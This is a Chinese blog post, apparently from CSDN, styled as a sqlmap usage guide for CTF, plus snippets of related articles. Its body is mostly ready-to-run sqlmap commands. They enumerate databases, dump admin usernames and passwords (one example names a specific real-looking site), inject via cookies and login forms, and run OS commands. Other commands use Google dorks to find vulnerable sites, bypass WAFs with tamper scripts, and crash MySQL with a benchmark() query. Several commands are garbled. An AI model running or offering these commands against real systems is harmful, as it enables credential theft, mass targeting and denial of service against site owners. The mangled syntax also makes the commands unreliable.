sqlmap的使用方法 --ctf

最新推荐文章于 2025-08-01 09:43:05 发布
原创 最新推荐文章于 2025-08-01 09:43:05 发布 · 731 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍如何使用SQLMap进行SQL注入攻击的各种技巧,包括普通注入、Cookie注入、POST登录框注入等,并介绍了如何利用SQLMap进行数据库操作,如查找库名、表名、列名以及数据内容。

普通注入

Sqlmap -u “http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” --dbs

找到一个sql的注入点 探测他的库名   access的直接探表名

Sqlmap -u “http://”http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -D 探测出来的库名 --tables

探测库名后探测表名

Sqlmap -u “http://”http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -D 探测出来的库名 -T 探测出来的表名 --columns

探测他的列名

sqlmap -u "http://www.riyuba.com/news/index.asp?cataid=241" --dump -T admin -C "user,pwd"

探他的数据

cookie注入

一般有验证的注入会导致我们的注入失败有些网站经常提示一些禁止填写update delete等的字样这个时候普通的sql就不好用了

这时候可以试试cookie注入

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --dbs 

查库

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --table --level 2

查表

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --columns -T admin --level 2

查字段

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --dump -T admin -C “username,passwd” --level 2

查内容

Post登录框注入

注入点 “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx”

首先将这个登陆界面用burpsuite截下来保存成一个txt的文本,然后指定变量

./sqlmap.py -r 保存的txt文本 -p 指定的参数

或者自动搜索表单的形式

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --forms

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --data “tfusermane=1111&tfpasswd=1111”

上一行的user和pass是指定的参数部分是要抓玩包看才知道的。

Sqlmap ——交互写shell及命令执行

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --cs-cmd=ifconfig

后面可能需要 填写什么样的环境php asp jsp 的选择   然后在填写一下根目录地址

伪静态注入

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --dbs

探测数据库

请求延时注入

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html”  --delay 1

后面的1表示的是隔一秒继续访问这个页面

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html”  --safe-freq 3

安全的频率为3次每秒 

Google的注入搜索

Sqlmap -g inurl:php? Id=

用google的搜索引擎自动取匹配url php环境 后面有id=xxx的网站

Mysql的dos攻击

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --sql-shell

首先在知道这个注入点之后我们先获取一下他的shell

Select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

在shell下可以用这条语句可以使数据库报错重启

绕过waf(利用脚本)注:不同的脚本针对的数据库也不同

Sqlmap -u “http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -v 3 --dbs --batch --tamper ‘space2morehash.py’

Space2hash.py             base64encode.py           charencode.py

这三个脚本是sqlmap自带的绕waf脚本各自的编码方式也不同

[网络安全自学篇] 二十七.Sqlmap基础知识、CTF实战及请求参数设置(一)
杨秀璋的专栏
11-21 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Shodan搜索引擎的基本用法及Python命令行。本篇文章详细讲解了Sqlmap的基本用法、CTF实战,并且分享了请求参数设置的用法,包括设置HTTP、POST请求、参数分割、设置Cookie等。本文的CTF实例推荐大家自己去尝试,从而熟悉SQLMAP的基本用法。
2024sqlmap语句大全及解析,ctfshow201--213边做题边写笔记
2301_81133475的博客
08-09 2096
ctf.show官方paload给出以上脚本,复制成新的文件就行了,我用的是kali自带sqlmap在目录usr/share/sqlmap目录里的tamper目录下vim个ctf209.py,然后正常用。加入对'select' 的过滤,可以用upppercase这个脚本,但是sqlmap默认就是大写的SELECT 直接按照原来的命令也完全可以,但如果是正常操作的话在207命令后面改为。HTTP/1.1有7种请求方法:1、GET;:这里表名他改了,你可以用我207的方法,那样就不用找表列了,知道数据库就行。
sqlmap使用基本方法和具体操作流程(CTFHub演练)
2302_80097039的博客
05-13 1210
先简单了解一些相关知识对url爆破:sqlmap -u url #判断注入点sqlmap -u url --current-dbs #查看当前所有数据库sqlmap -u url --current-db #查看当前数据库sqlmap -u url -D 库名 --tables #爆表sqlmap -u url -D 库名 -T 表名 --columns #爆字段sqlmap -u url -D 库名 -T 表名 --C 字段名1,字段名2 --dump #爆数据。
CTF-WEB-SQL】SQL注入基本流程(sql-labs的Less11)(用burp抓取post然后用sqlmap盲注)
最新发布
qq_37400312的博客
08-01 395
从第11less开始,就是POST表单了。
【无标题】CTFSQLMAP
qq_51802152的博客
12-18 1024
CTFSQLMAP
CTF刷题--SQL注入(sqlmap
weixin_43882862的博客
08-13 3090
靶场第一题,解法2,使用sqlmap 解题思路(在kali下操作) 1、检测是否有sql注入漏洞 检测出来有id sqlmap -u http://59.63.200.79:8003/?id=1 2、获取当前用户 sqlmap -u http://59.63.200.79:8003/?id=1 --current-user 3、获取当前数据库 sqlmap -u http://59.63.200.79:8003/?id=1 --current-db 4、获取所有数据库 sqlmap -u http:/
sqlmapproject-sqlmap-1.5.4-2-gfc486c8.zip
08-26
总结来说,Sqlmap是一款强大的SQL注入工具,它的功能全面,使用便捷,无论是用于测试网站的安全性,还是在CTF竞赛中攻防对抗,都表现出色。对于任何涉及网络安全的专业人士,掌握Sqlmap使用无疑将极大地提升工作...
sqlmap使用教程
热门推荐
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
SQL注入篇5(sqlmap使用Web201-210)
m0_72929232的博客
10-05 1106
这几个题在B站ctfshow上都有讲解。
CTFHub——技能树——SQL注入(sqlmap
sparename的博客
12-26 7773
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
Sqlmap使用教程【超全】
MickeyMouse1928的博客
05-11 7516
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
Azreal的博客
07-09 2216
.Sqlmap介绍 Sqlmap 是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。许多适合于终极渗透测试的小众特性和广泛的开发,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。 Sqlmap下载 可以从官方网址、Github或Python调用PIP命令实现。 官方网址:http://sqlmap.org.
CTF/CTF练习平台-成绩查询【sqlmap post方法
Sp4rkW的博客
08-30 5225
原题内容: 快来查查成绩吧 http://120.24.86.145:8002/chengjidan/ 学习资料: SQLMap中文参数用户手册 sqlmap WAF绕过/tamper详解 这题还是很基本的注入,首先手工尝试 延时五秒显示,结果是和只输入1一样,很明显,这是一个注入点,然后sleep既然是有效果的,不烦试一试sqlmap 这里用到了post方...
CTF-Web工具-Sqlmap学习
2301_81208321的博客
07-24 195
使用Python开发,想要在windows系统下使用需要安装Python环境。解压后便可以使用了正确安装环境并部署源码包之后,在命令行下输入会显示类似下图所示的界面。
CTF web入门之SQL注入使用工具sqlmap
qq_41701460的博客
04-22 488
题目有提到 使用–user-agent 指定agent,因为对于 sqlmap 默认的 user-agent 会包含 sqlmap 关键字,很多时候我们会使用 --random-agent 来随机 ua 头。追加 --safe-url 参数设置在测试目标地址前访问的安全链接,将 url 设置为 api/getToken.php,再加上 --safe-preq=1 表示访问 api/getToken.php 一次。注入点 布尔注入 时间注入 联合注入。查看数据库 获取不到数据库信息。
CTF-web 第十二部分 sqlmap专题
iamsongyu的博客
11-25 2706
  sqlmap开源又功能强大的工具,支持现在几乎所有的数据库,比国内的任何工具都强。支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效, 指纹识别技术判断数据库。   当给sqlmap这么一个url (http://192.168.136.131/sqlmap/mysql/get_...
攻防_漏洞_SQL注入_SQLmap使用
redglare的博客
12-01 547
SQLMap是⼀个开源的渗透测试⼯具,可以⾃动检测和利⽤SQL注⼊漏洞以及接⼊该数据库的服务器。 它拥有⾮常强⼤的检测引擎,具有多种特性的渗透测试器、通过数据库指纹提取访问底层⽂件系统并 通过外带链接执⾏命令。 SQLmap的常⽤参数有 –all 获取所有内容 –help 获取帮助 –dbs 获取数据库列表 –table -D “数据库” 获取数据库中的表 –columns -D “数据库” -T “数据表” 获取指定表中的字段名 –dump -D “数据库” -T “数据表” -C 获取该字段的内容 .
CTFHUB|SQL注入(sqlmap
m0_60651303的博客
07-14 1420
差不多学了4天的SQL手工注入,学习一下sqlmap使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
ctf+sqlmap使用例子
12-02
以下是一个使用Sqlmap进行CTF攻击的例子: 假设我们有一个目标网站,我们需要使用Sqlmap来查找该网站的数据库名称和用户表。我们可以使用以下命令: ```shell python sqlmap.py -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值